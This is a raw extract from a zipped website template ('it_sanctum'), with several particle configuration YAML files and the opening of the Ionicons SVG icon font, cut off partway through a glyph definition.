boundary: '#g-footer'
css:
  class: ''
extra: {  }
items: {  }
PK!W�\\5it_sanctum/config/default/particles/contentarray.yamlnu&1i�enabled: '1'
article:
  filter:
    categories: ''
    articles: ''
    featured: include
  limit:
    total: '2'
    columns: '2'
    start: '0'
  sort:
    orderby: publish_up
    ordering: ASC
  display:
    image:
      enabled: intro
    text:
      type: intro
      limit: ''
      formatting: text
    title:
      enabled: show
      limit: ''
    date:
      enabled: published
      format: 'l, F d, Y'
    read_more:
      enabled: show
      label: ''
      css: ''
    author:
      enabled: show
    category:
      enabled: link
    hits:
      enabled: show
css:
  class: ''
extra: {  }
PK!]1�8aa7it_sanctum/config/default/particles/image-features.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
columns: '2'
css:
  class: ''
extra: {  }
items: {  }
PK!f�L<,,/it_sanctum/config/default/particles/custom.yamlnu&1i�enabled: '1'
html: ''
twig: '0'
filter: '0'
PK!a�Z�

4it_sanctum/config/default/particles/mobile-menu.yamlnu&1i�enabled: '1'
PK!5(�5qq2it_sanctum/config/default/particles/media-box.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
tooltippos: top
columns: '1'
items: {  }
css:
  class: ''
extra: {  }
PK!�ѿ��1it_sanctum/config/default/particles/our-team.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
navigation: arrows
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!Z�V�

,it_sanctum/fonts/ionicons/fonts/ionicons.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<!--
2014-12-4: Created.
-->
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
Created by FontForge 20120731 at Thu Dec  4 09:51:48 2014
 By Adam Bradley
Created by Adam Bradley with FontForge 2.0 (http://fontforge.sf.net)
</metadata>
<defs>
<font id="Ionicons" horiz-adv-x="448" >
  <font-face 
    font-family="Ionicons"
    font-weight="500"
    font-stretch="normal"
    units-per-em="512"
    panose-1="2 0 6 3 0 0 0 0 0 0"
    ascent="448"
    descent="-64"
    bbox="-0.54049 -64 512.487 448"
    underline-thickness="25.6"
    underline-position="-51.2"
    unicode-range="U+F100-F4F7"
  />
    <missing-glyph />
    <glyph glyph-name="ion-alert-circled" unicode="&#xf100;" 
d="M445 26c3 -5 5 -13 2 -18s-8 -8 -14 -8h-418c-6 0 -11 3 -14 8s-1 13 2 18l207 349c3 5 8 9 14 9s11 -4 14 -9zM256 48v48h-64v-48h64zM256 128v144h-64v-144h64z" />
    <glyph glyph-name="ion-alert" unicode="&#xf101;" horiz-adv-x="128" 
d="M128 -32h-128v96h128v-96zM112 128h-96l-16 288h128z" />
    <glyph glyph-name="ion-android-add-circle" unicode="&#xf359;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM315 171v42h-86v86h-42v-86h-86v-42h86v-86h42v86h86z" />
    <glyph glyph-name="ion-android-add" unicode="&#xf2c7;" horiz-adv-x="320" 
d="M320 171h-139v-139h-42v139h-139v42h139v139h42v-139h139v-42z" />
    <glyph glyph-name="ion-android-alarm-clock" unicode="&#xf35a;" horiz-adv-x="428" 
d="M428 323l-28 -33l-98 82l28 33zM125 373l-97 -83l-28 33l97 83zM225 275v0v-111l85 -50l-16 -27l-101 61v127h32zM214 360c106 0 193 -86 193 -191s-87 -191 -193 -191c-107 0 -193 86 -193 191s86 191 193 191zM214 20c82 0 150 66 150 149c0 82 -68 149 -150 149
s-150 -67 -150 -149s68 -149 150 -149z" />
    <glyph glyph-name="ion-android-alert" unicode="&#xf35b;" horiz-adv-x="416" 
d="M208 400c114 0 208 -94 208 -208s-94 -208 -208 -208s-208 94 -208 208s94 208 208 208zM232 88v40h-48v-40h48zM232 176v128h-48v-128h48z" />
    <glyph glyph-name="ion-android-apps" unicode="&#xf35c;" horiz-adv-x="320" 
d="M0 272v80h80v-80h-80zM120 32v80h80v-80h-80zM0 32v80h80v-80h-80zM0 152v80h80v-80h-80zM120 152v80h80v-80h-80zM240 352h80v-80h-80v80zM120 272v80h80v-80h-80zM240 152v80h80v-80h-80zM240 32v80h80v-80h-80z" />
    <glyph glyph-name="ion-android-archive" unicode="&#xf2c9;" horiz-adv-x="416" 
d="M406 348c7 -7 10 -17 10 -29v-289c0 -25 -21 -46 -46 -46h-324c-25 0 -46 21 -46 46v289c0 12 3 22 10 29l33 39c6 8 16 13 26 13h278c10 0 20 -5 26 -13zM208 65l127 127h-81v46h-92v-46h-81zM49 354h317l-22 23h-277z" />
    <glyph glyph-name="ion-android-arrow-back" unicode="&#xf2ca;" horiz-adv-x="342" 
d="M342 213v-42h-260l119 -120l-30 -30l-171 171l171 171l31 -30l-120 -120h260z" />
    <glyph glyph-name="ion-android-arrow-down" unicode="&#xf35d;" horiz-adv-x="342" 
d="M192 363v-260l120 120l30 -31l-171 -171l-171 171l30 30l120 -119v260h42z" />
    <glyph glyph-name="ion-android-arrow-dropdown-circle" unicode="&#xf35e;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 128l96 96h-192z" />
    <glyph glyph-name="ion-android-arrow-dropdown" unicode="&#xf35f;" horiz-adv-x="256" 
d="M0 256h256l-128 -128z" />
    <glyph glyph-name="ion-android-arrow-dropleft-circle" unicode="&#xf360;" horiz-adv-x="416" 
d="M416 192c0 -115 -93 -208 -208 -208s-208 93 -208 208s93 208 208 208s208 -93 208 -208zM144 192l96 -96v192z" />
    <glyph glyph-name="ion-android-arrow-dropleft" unicode="&#xf361;" horiz-adv-x="128" 
d="M128 320v-256l-128 128z" />
    <glyph glyph-name="ion-android-arrow-dropright-circle" unicode="&#xf362;" horiz-adv-x="416" 
d="M208 -16c-115 0 -208 93 -208 208s93 208 208 208s208 -93 208 -208s-93 -208 -208 -208zM176 96l96 96l-96 96v-192z" />
    <glyph glyph-name="ion-android-arrow-dropright" unicode="&#xf363;" horiz-adv-x="128" 
d="M0 320l128 -128l-128 -128v256z" />
    <glyph glyph-name="ion-android-arrow-dropup-circle" unicode="&#xf364;" horiz-adv-x="416" 
d="M416 192c0 -115 -93 -208 -208 -208s-208 93 -208 208s93 208 208 208s208 -93 208 -208zM304 160l-96 96l-96 -96h192z" />
    <glyph glyph-name="ion-android-arrow-dropup" unicode="&#xf365;" horiz-adv-x="256" 
d="M0 128l128 128l128 -128h-256z" />
    <glyph glyph-name="ion-android-arrow-forward" unicode="&#xf30f;" horiz-adv-x="342" 
d="M0 171v42h260l-119 120l30 30l171 -171l-171 -171l-31 30l120 120h-260z" />
    <glyph glyph-name="ion-android-arrow-up" unicode="&#xf366;" horiz-adv-x="342" 
d="M192 21h-42v260l-120 -119l-30 30l171 171l171 -171l-30 -31l-120 120v-260z" />
    <glyph glyph-name="ion-android-attach" unicode="&#xf367;" horiz-adv-x="235" 
d="M203 320h32v-235c0 -65 -53 -117 -118 -117s-117 52 -117 117v246c0 47 38 85 85 85s86 -38 86 -85v-246c0 -30 -24 -53 -54 -53s-53 23 -53 53v203h32v-203c0 -12 9 -21 21 -21s22 9 22 21v246c0 30 -24 53 -54 53s-53 -23 -53 -53v-246c0 -47 38 -85 85 -85
s86 38 86 85v235z" />
    <glyph glyph-name="ion-android-bar" unicode="&#xf368;" horiz-adv-x="384" 
d="M171 171l-171 170v43h384v-43l-171 -170v-131h107v-40h-256v40h107v131zM96 299h192l43 42h-278z" />
    <glyph glyph-name="ion-android-bicycle" unicode="&#xf369;" 
d="M299 317c-19 0 -34 14 -34 33s15 34 34 34s33 -15 33 -34s-14 -33 -33 -33zM355 187c51 0 93 -43 93 -94s-42 -93 -93 -93s-94 42 -94 93s43 94 94 94zM355 28c36 0 65 29 65 65s-29 66 -65 66s-66 -30 -66 -66s30 -65 66 -65zM274 224l-30 45l-43 -45l39 -32v-112h-32
v86l-61 38c-9 6 -19 15 -19 27c0 8 3 17 9 23l72 69c6 6 14 9 22 9c11 0 22 -7 28 -16l34 -60h59v-32h-78zM93 187c51 0 94 -43 94 -94s-43 -93 -94 -93s-93 42 -93 93s42 94 93 94zM93 28c36 0 66 29 66 65s-30 66 -66 66s-65 -30 -65 -66s29 -65 65 -65z" />
    <glyph glyph-name="ion-android-boat" unicode="&#xf36a;" 
d="M52 35l-51 139c-2 6 -1 12 1 17s8 8 13 10l38 13v98c0 23 20 43 43 43h64l16 53h96l16 -53h64c23 0 43 -20 43 -43v-98l38 -13c5 -2 11 -5 13 -10s3 -12 1 -17l-51 -139h-1c-34 0 -65 20 -86 43c-21 -23 -51 -43 -85 -43s-64 19 -85 42c-21 -23 -52 -42 -86 -42h-1z
M96 312v-84l128 41l128 -41v84h-256zM309 40c0 0 59 -64 107 -64h-21c-30 0 -59 12 -86 26c-53 -28 -117 -28 -170 0c-27 -14 -56 -26 -86 -26h-21c49 0 107 64 107 64c52 -36 118 -36 170 0z" />
    <glyph glyph-name="ion-android-bookmark" unicode="&#xf36b;" horiz-adv-x="288" 
d="M248 384c22 0 40 -18 40 -40v-344l-144 64l-144 -64v344c0 22 18 40 40 40h208z" />
    <glyph glyph-name="ion-android-bulb" unicode="&#xf36c;" 
d="M224 278c-25 0 -50 -10 -68 -28s-28 -43 -28 -68c0 -34 18 -66 48 -83l16 -10v-18v-71h64v71v18l16 10c15 8 27 20 35 34c9 15 13 31 13 49c0 25 -10 50 -28 68s-43 28 -68 28zM245 416v0v-64h-42v64h42zM374 362v0l30 -30l-38 -38l-30 30zM74 362v0l38 -38l-30 -30
l-38 38zM224 310v0c70 0 128 -58 128 -128c0 -48 -26 -89 -64 -111v-103h-128v103c-38 22 -64 64 -64 111c0 70 58 128 128 128zM448 203v0v-42h-64v42h64zM64 203v0v-42h-64v42h64z" />
    <glyph glyph-name="ion-android-bus" unicode="&#xf36d;" horiz-adv-x="352" 
d="M0 96v204c0 75 82 84 176 84s176 -9 176 -84v-204c0 -18 -14 -24 -27 -36v-39c0 -12 -9 -21 -21 -21h-21c-12 0 -22 9 -22 21v22h-170v-22c0 -12 -10 -21 -22 -21h-21c-12 0 -21 9 -21 21v39c-13 12 -27 17 -27 36zM80 80c18 0 32 14 32 32s-14 32 -32 32
s-32 -14 -32 -32s14 -32 32 -32zM272 80c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM304 203v106h-256v-106h256z" />
    <glyph glyph-name="ion-android-calendar" unicode="&#xf2d1;" horiz-adv-x="384" 
d="M304 176v-96h-96v96h96zM272 384h48v-32h24c22 0 40 -18 40 -40v-272c0 -22 -18 -40 -40 -40h-304c-22 0 -40 18 -40 40v272c0 22 18 40 40 40h24v32h48v-32h160v32zM344 40v212h-304v-212h304z" />
    <glyph glyph-name="ion-android-call" unicode="&#xf2d2;" horiz-adv-x="384" 
d="M363 117c12 0 21 -9 21 -21v-75c0 -12 -9 -21 -21 -21c-201 0 -363 162 -363 363c0 12 9 21 21 21h75c12 0 21 -9 21 -21c0 -27 4 -52 13 -77c2 -7 0 -16 -5 -21l-47 -47c31 -61 80 -110 141 -141l47 47c5 6 14 7 21 5c23 -7 49 -12 76 -12z" />
    <glyph glyph-name="ion-android-camera" unicode="&#xf2d3;" 
d="M161 168c0 42 21 63 63 63s63 -21 63 -63s-21 -63 -63 -63s-63 21 -63 63zM408 352c11 0 20 -4 28 -12s12 -17 12 -28v-272c0 -11 -4 -20 -12 -28s-17 -12 -28 -12h-368c-11 0 -20 4 -28 12s-12 17 -12 28v272c0 11 4 20 12 28s17 12 28 12h88l32 32h128l32 -32h88z
M224 56c31 0 57 11 79 33s33 48 33 79s-11 57 -33 79s-48 33 -79 33s-57 -11 -79 -33s-33 -48 -33 -79s11 -57 33 -79s48 -33 79 -33z" />
    <glyph glyph-name="ion-android-cancel" unicode="&#xf36e;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM312 117l-75 75l75 75l-29 29l-75 -75l-75 75l-29 -29l75 -75l-75 -75l29 -29l75 75l75 -75z" />
    <glyph glyph-name="ion-android-car" unicode="&#xf36f;" horiz-adv-x="384" 
d="M339 331l45 -118v-160c0 -12 -9 -21 -21 -21h-22c-12 0 -21 9 -21 21v11h-256v-11c0 -12 -9 -21 -21 -21h-22c-12 0 -21 9 -21 21v160l45 118c4 13 16 21 30 21h234c14 0 26 -8 30 -21zM75 128c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM309 128
c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM43 235h298l-32 85h-234z" />
    <glyph glyph-name="ion-android-cart" unicode="&#xf370;" horiz-adv-x="416" 
d="M122 70c23 0 41 -18 41 -41s-18 -42 -41 -42s-42 19 -42 42s19 41 42 41zM0 397h68l19 -42h308c11 0 21 -9 21 -20c0 -4 -1 -8 -2 -10l-75 -129c-7 -14 -20 -22 -36 -22h-155l-21 -32s-2 -5 -2 -6c0 -3 2 -5 5 -5h238v-40h-243c-26 0 -45 14 -45 42c0 7 2 15 5 20l31 51
l-74 151h-42v42zM326 70c23 0 42 -18 42 -41s-19 -42 -42 -42s-41 19 -41 42s18 41 41 41z" />
    <glyph glyph-name="ion-android-chat" unicode="&#xf2d4;" horiz-adv-x="416" 
d="M344 384c4 0 7 -4 7 -8v-214c0 -4 -3 -9 -7 -9h-187l-90 -89v89h-57c-4 0 -10 5 -10 9v214c0 4 6 8 10 8h334zM408 321c4 0 8 -5 8 -9v-214c0 -4 -4 -9 -8 -9h-57v-89l-90 89h-130l39 39h181c18 0 25 10 25 26v167h32z" />
    <glyph glyph-name="ion-android-checkbox-blank" unicode="&#xf371;" horiz-adv-x="384" 
d="M341 384c23 0 43 -20 43 -43v-298c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h298z" />
    <glyph glyph-name="ion-android-checkbox-outline-blank" unicode="&#xf372;" horiz-adv-x="384" 
d="M341 341h-298v-298h298v298zM341 384v0c23 0 43 -20 43 -43v-298c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h298z" />
    <glyph glyph-name="ion-android-checkbox-outline" unicode="&#xf373;" horiz-adv-x="384" 
d="M105 233l66 -66l183 183l30 -30l-213 -213l-96 96zM341 43v170h43v-170c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h213v-43h-213v-298h298z" />
    <glyph glyph-name="ion-android-checkbox" unicode="&#xf374;" horiz-adv-x="384" 
d="M341 384c23 0 43 -20 43 -43v-298c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h298zM149 85l192 192l-30 30l-162 -162l-76 77l-30 -30z" />
    <glyph glyph-name="ion-android-checkmark-circle" unicode="&#xf375;" horiz-adv-x="416" 
d="M123 232l64 -64l179 178l29 -29l-208 -208l-93 93zM374 192h42c0 -114 -94 -208 -208 -208s-208 94 -208 208s94 208 208 208c28 0 54 -6 78 -16l-32 -32c-15 4 -30 6 -46 6c-92 0 -166 -74 -166 -166s74 -166 166 -166s166 74 166 166z" />
    <glyph glyph-name="ion-android-clipboard" unicode="&#xf376;" horiz-adv-x="384" 
d="M341 368c23 0 43 -20 43 -43v-314c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v314c0 23 20 43 43 43h87c7 28 32 48 62 48s55 -20 62 -48h87zM192 368c-12 0 -21 -9 -21 -21s9 -22 21 -22s21 10 21 22s-9 21 -21 21zM344 8v320h-40v-72h-224v72h-40v-320h304z" />
    <glyph glyph-name="ion-android-close" unicode="&#xf2d7;" horiz-adv-x="298" 
d="M298 311l-119 -119l119 -119l-30 -30l-119 119l-119 -119l-30 30l119 119l-119 119l30 30l119 -119l119 119z" />
    <glyph glyph-name="ion-android-cloud-circle" unicode="&#xf377;" horiz-adv-x="416" 
d="M208 400c114 0 208 -94 208 -208s-94 -208 -208 -208s-208 94 -208 208s94 208 208 208zM302 109c29 0 52 23 52 52s-23 52 -52 52h-11c0 46 -37 83 -83 83c-38 0 -71 -26 -80 -62h-3c-34 0 -63 -29 -63 -63s29 -62 63 -62h177z" />
    <glyph glyph-name="ion-android-cloud-done" unicode="&#xf378;" horiz-adv-x="480" 
d="M387 231c52 -3 93 -46 93 -99c0 -55 -45 -100 -100 -100h-260c-66 0 -120 54 -120 120c0 62 47 113 107 119c25 48 75 81 133 81c73 0 133 -52 147 -121zM197 85l141 141l-30 30l-111 -111l-44 45l-30 -30z" />
    <glyph glyph-name="ion-android-cloud-outline" unicode="&#xf379;" horiz-adv-x="480" 
d="M387 231c52 -3 93 -46 93 -99c0 -55 -45 -100 -100 -100h-260c-66 0 -120 54 -120 120c0 62 47 113 107 119c25 48 75 81 133 81c73 0 133 -52 147 -121zM380 72c33 0 60 27 60 60s-27 60 -60 60h-30v10c0 61 -49 110 -110 110c-51 0 -93 -34 -106 -80h-14
c-44 0 -80 -36 -80 -80s36 -80 80 -80h260z" />
    <glyph glyph-name="ion-android-cloud" unicode="&#xf37a;" horiz-adv-x="480" 
d="M387 231c52 -3 93 -46 93 -99c0 -55 -45 -100 -100 -100h-260c-66 0 -120 54 -120 120c0 62 47 113 107 119c25 48 75 81 133 81c73 0 133 -52 147 -121z" />
    <glyph glyph-name="ion-android-color-palette" unicode="&#xf37b;" horiz-adv-x="384" 
d="M192 384c106 0 192 -77 192 -171c0 -59 -48 -106 -107 -106h-38c-18 0 -32 -14 -32 -32c0 -9 3 -17 8 -22s9 -12 9 -21c0 -18 -14 -32 -32 -32c-106 0 -192 86 -192 192s86 192 192 192zM75 192c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM139 277
c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM245 277c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM309 192c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-android-compass" unicode="&#xf37c;" 
d="M224 217c13 0 25 -12 25 -25s-12 -25 -25 -25s-25 12 -25 25s12 25 25 25zM224 416c123 0 224 -101 224 -224s-101 -224 -224 -224s-224 101 -224 224s101 224 224 224zM273 143l85 183l-183 -85l-85 -183z" />
    <glyph glyph-name="ion-android-contact" unicode="&#xf2d8;" horiz-adv-x="384" 
d="M267 110c59 -18 104 -58 117 -110h-384c13 52 58 92 117 110c22 -13 48 -20 75 -20s53 7 75 20zM192 384c73 0 132 -59 132 -132s-59 -132 -132 -132s-132 59 -132 132s59 132 132 132zM192 153c42 0 78 26 92 63h-184c14 -37 50 -63 92 -63z" />
    <glyph glyph-name="ion-android-contacts" unicode="&#xf2d9;" 
d="M207 104c47 -14 76 -62 87 -104h-294c11 42 40 90 87 104c18 -10 38 -16 60 -16s42 6 60 16zM147 328c58 0 106 -48 106 -106s-48 -106 -106 -106s-106 48 -106 106s48 106 106 106zM147 141c34 0 62 23 74 51h-148c12 -28 40 -51 74 -51zM291 64c-13 20 -34 43 -60 53
c11 9 21 23 28 35c13 -5 27 -8 42 -8c22 0 42 6 60 16c47 -14 76 -54 87 -96h-157zM275 248c-8 37 -31 69 -63 87c19 29 52 49 89 49c58 0 106 -48 106 -106s-48 -106 -106 -106c-11 0 -22 2 -32 5c3 8 6 16 7 25c8 -3 16 -4 25 -4c34 0 62 22 74 50h-100z" />
    <glyph glyph-name="ion-android-contract" unicode="&#xf37d;" horiz-adv-x="384" 
d="M0 77v51h128v-128h-51v77h-77zM77 307v77h51v-128h-128v51h77zM256 0v128h128v-51h-77v-77h-51zM307 307h77v-51h-128v128h51v-77z" />
    <glyph glyph-name="ion-android-create" unicode="&#xf37e;" horiz-adv-x="384" 
d="M0 80l236 236l80 -80l-236 -236h-80v80zM378 298l-40 -40l-80 80l40 40c9 9 20 9 29 0l51 -51c9 -9 9 -20 0 -29z" />
    <glyph glyph-name="ion-android-delete" unicode="&#xf37f;" horiz-adv-x="320" 
d="M32 43v245h256v-245c0 -23 -20 -43 -43 -43h-170c-23 0 -43 20 -43 43zM320 352v-32h-320v32h80l27 32h106l27 -32h80z" />
    <glyph glyph-name="ion-android-desktop" unicode="&#xf380;" 
d="M405 416c23 0 43 -20 43 -43v-282c0 -23 -20 -43 -43 -43h-138l42 -48v-32h-170v32l42 48h-138c-23 0 -43 20 -43 43v282c0 23 20 43 43 43h362zM405 128v245h-362v-245h362z" />
    <glyph glyph-name="ion-android-document" unicode="&#xf381;" horiz-adv-x="320" 
d="M192 400l128 -128v-248c0 -22 -18 -40 -40 -40h-240c-22 0 -40 18 -40 40v336c0 22 18 40 40 40h152zM176 256h112l-112 112v-112z" />
    <glyph glyph-name="ion-android-done-all" unicode="&#xf382;" horiz-adv-x="512" 
d="M388 308l-140 -139l-31 31l140 139zM481 339l31 -31l-264 -263l-122 123l30 31l92 -91zM0 168l32 31l122 -123l-31 -31z" />
    <glyph glyph-name="ion-android-done" unicode="&#xf383;" horiz-adv-x="384" 
d="M122 108l230 230l32 -31l-262 -261l-122 122l32 31z" />
    <glyph glyph-name="ion-android-download" unicode="&#xf2dd;" horiz-adv-x="480" 
d="M387 231c52 -3 93 -46 93 -99c0 -55 -45 -100 -100 -100h-260c-66 0 -120 54 -120 120c0 62 47 113 107 119c25 48 75 81 133 81c73 0 133 -52 147 -121zM208 180h-68l100 -100l100 100h-68v76h-64v-76z" />
    <glyph glyph-name="ion-android-drafts" unicode="&#xf384;" 
d="M448 246v-203c0 -23 -20 -43 -43 -43h-362c-23 0 -43 20 -43 43v203c0 15 8 30 20 37l204 101l204 -101c13 -7 20 -22 20 -37zM224 144l171 112l-171 85l-171 -85z" />
    <glyph glyph-name="ion-android-exit" unicode="&#xf385;" horiz-adv-x="384" 
d="M151 115l55 56h-206v42h207l-56 56l30 30l107 -107l-107 -107zM341 384c23 0 43 -20 43 -43v-298c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v85h43v-85h298v298h-298v-85h-43v85c0 23 20 43 43 43h298z" />
    <glyph glyph-name="ion-android-expand" unicode="&#xf386;" horiz-adv-x="384" 
d="M333 51v77h51v-128h-128v51h77zM333 333h-77v51h128v-128h-51v77zM51 333v-77h-51v128h128v-51h-77zM51 51h77v-51h-128v128h51v-77z" />
    <glyph glyph-name="ion-android-favorite-outline" unicode="&#xf387;" horiz-adv-x="416" 
d="M302 384c64 0 114 -50 114 -115c0 -80 -71 -144 -178 -242l-30 -27l-30 27c-107 98 -178 162 -178 242c0 65 50 115 114 115c36 0 71 -17 94 -44c23 27 58 44 94 44zM221 55c50 46 94 86 123 122c28 35 40 63 40 92c0 23 -9 44 -24 59s-35 24 -58 24
c-26 0 -53 -13 -70 -33l-24 -29l-24 29c-17 20 -44 33 -70 33c-23 0 -43 -9 -58 -24s-24 -36 -24 -59c0 -29 12 -57 40 -92c29 -36 73 -76 123 -122l4 -4l9 -8l9 8z" />
    <glyph glyph-name="ion-android-favorite" unicode="&#xf388;" horiz-adv-x="416" 
d="M208 0l-30 27c-107 98 -178 162 -178 242c0 65 50 115 114 115c36 0 71 -17 94 -44c23 27 58 44 94 44c64 0 114 -50 114 -115c0 -80 -71 -144 -178 -242z" />
    <glyph glyph-name="ion-android-film" unicode="&#xf389;" horiz-adv-x="320" 
d="M280 384h40v-384h-40v43h-40v-43h-160v43h-40v-43h-40v384h40v-43h40v43h160v-43h40v43zM80 85v43h-40v-43h40zM80 171v42h-40v-42h40zM80 256v43h-40v-43h40zM280 85v43h-40v-43h40zM280 171v42h-40v-42h40zM280 256v43h-40v-43h40z" />
    <glyph glyph-name="ion-android-folder-open" unicode="&#xf38a;" 
d="M405 304c23 0 43 -20 43 -43v-186c0 -23 -20 -43 -43 -43h-362c-23 0 -43 20 -43 43v234c0 23 20 43 43 43h138l43 -48h181zM416 75v186c0 6 -5 11 -11 11h-373v-197c0 -6 5 -11 11 -11h362c6 0 11 5 11 11z" />
    <glyph glyph-name="ion-android-folder" unicode="&#xf2e0;" 
d="M181 352l43 -48h181c23 0 43 -20 43 -43v-186c0 -23 -20 -43 -43 -43h-362c-23 0 -43 20 -43 43v234c0 23 20 43 43 43h138z" />
    <glyph glyph-name="ion-android-funnel" unicode="&#xf38b;" 
d="M176 48v48h96v-48h-96zM0 336h448v-48h-448v48zM80 167v50h288v-50h-288z" />
    <glyph glyph-name="ion-android-globe" unicode="&#xf38c;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM186 15c6 15 21 29 8 39c-8 7 -16 14 -23 21c-2 2 -11 20 -9 23c5 9 6 14 8 24c3 12 -3 16 -13 22c-15 10 -29 23 -43 34c-7 5 -17 10 -20 19s-5 20 -10 28c-14 20 -12 34 -10 58
c0 7 -1 16 -2 25c-28 -32 -42 -73 -42 -116c0 -48 18 -92 52 -126c29 -29 65 -46 104 -51zM334 66c23 23 39 51 47 82c-8 -1 -19 2 -19 2s-21 24 -23 45c-2 22 0 39 -3 57c-3 16 -20 31 -27 46c-7 14 -13 28 -20 42c2 -1 5 -2 7 -3c5 1 10 2 14 2c-23 16 -49 25 -76 29v-8
l4 -9l-14 -13l-9 3l-10 10l-10 12l-14 5c-16 -2 -31 -7 -45 -13v-7c7 3 16 5 23 8c3 1 13 -7 16 -9c-4 -5 -21 -15 -22 -21c0 -2 7 -6 7 -10c0 -6 -1 -11 -1 -17c3 3 20 21 22 21c13 3 35 -19 37 -26s-22 -24 -33 -34c-8 -8 -25 -12 -20 -24c2 -4 10 -20 5 -24
c-6 -5 -14 9 -17 12c-8 10 -26 7 -38 7c0 -17 -1 -31 15 -43c15 -11 30 -25 47 -33c13 -6 36 7 47 -1c16 -11 29 -21 47 -29c8 -3 33 -20 26 -31c-5 -8 -10 -15 -14 -23s-13 -20 -20 -25c-8 -6 -16 -17 -21 -29c35 7 66 23 92 49z" />
    <glyph glyph-name="ion-android-hand" unicode="&#xf2e3;" horiz-adv-x="414" 
d="M401 174c15 -15 18 -36 3 -51c0 0 -96 -103 -126 -121v0c-28 -21 -65 -34 -100 -34c-55 0 -101 36 -117 85v0v1c0 1 -1 2 -1 3l-58 189c-5 15 2 32 17 37s30 -3 35 -18l34 -88c1 -4 2 -2 2 1l-22 161c-3 15 7 30 22 33s30 -8 33 -23l25 -138c0 -2 2 -2 2 0v177
c0 15 13 28 28 28s28 -13 28 -28l8 -175c0 -5 3 -4 4 -1l23 135c2 15 16 27 31 25s27 -17 25 -32l-21 -172c-1 -12 -3 -30 2 -36c8 -9 20 -9 31 2l42 42c15 15 35 13 50 -2z" />
    <glyph glyph-name="ion-android-hangout" unicode="&#xf38d;" horiz-adv-x="352" 
d="M176 400c97 0 176 -77 176 -172c0 -91 -76 -196 -176 -244v71c-97 0 -176 78 -176 173s79 172 176 172zM166 217v61h-62v-61h31l-21 -40h31zM248 217v61h-62v-61h31l-20 -40h31z" />
    <glyph glyph-name="ion-android-happy" unicode="&#xf38e;" horiz-adv-x="416" 
d="M208 400c114 0 208 -94 208 -208s-93 -208 -208 -208s-208 94 -208 208s93 208 208 208zM208 26c92 0 166 74 166 166s-74 166 -166 166s-166 -74 -166 -166s74 -166 166 -166zM281 213c-18 0 -31 13 -31 31s13 31 31 31s31 -13 31 -31s-13 -31 -31 -31zM135 213
c-18 0 -31 13 -31 31s13 31 31 31s31 -13 31 -31s-13 -31 -31 -31zM208 78c-49 0 -89 29 -106 72h212c-17 -43 -57 -72 -106 -72z" />
    <glyph glyph-name="ion-android-home" unicode="&#xf38f;" horiz-adv-x="416" 
d="M160 0h-98v192h-62l208 192l208 -192h-62v-192h-98v128h-96v-128z" />
    <glyph glyph-name="ion-android-image" unicode="&#xf2e4;" horiz-adv-x="384" 
d="M384 43c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h298c23 0 43 -20 43 -43v-298zM117 160l-74 -96h298l-96 128l-74 -96z" />
    <glyph glyph-name="ion-android-laptop" unicode="&#xf390;" horiz-adv-x="512" 
d="M437 32h75c0 -23 -64 -32 -96 -32h-320c-32 0 -96 9 -96 32h75c-23 0 -43 20 -43 43v266c0 23 20 43 43 43h362c23 0 43 -20 43 -43v-266c0 -23 -20 -43 -43 -43zM75 341v-272h362v272h-362zM256 13c12 0 21 10 21 22s-9 21 -21 21s-21 -9 -21 -21s9 -22 21 -22z" />
    <glyph glyph-name="ion-android-list" unicode="&#xf391;" horiz-adv-x="384" 
d="M344 384c22 0 40 -18 40 -40v-304c0 -22 -18 -40 -40 -40h-304c-22 0 -40 18 -40 40v304c0 22 18 40 40 40h304zM240 80v48h-160v-48h160zM304 168v48h-224v-48h224zM304 256v48h-224v-48h224z" />
    <glyph glyph-name="ion-android-locate" unicode="&#xf2e9;" 
d="M224 272c44 0 80 -36 80 -80s-36 -80 -80 -80s-80 36 -80 80s36 80 80 80zM415 213h33v-42h-33c-10 -89 -81 -160 -170 -170v-33h-42v33c-89 10 -160 81 -170 170h-33v42h33c10 89 81 160 170 170v33h42v-33c89 -10 160 -81 170 -170zM224 43c82 0 149 67 149 149
s-67 149 -149 149s-149 -67 -149 -149s67 -149 149 -149z" />
    <glyph glyph-name="ion-android-lock" unicode="&#xf392;" horiz-adv-x="320" 
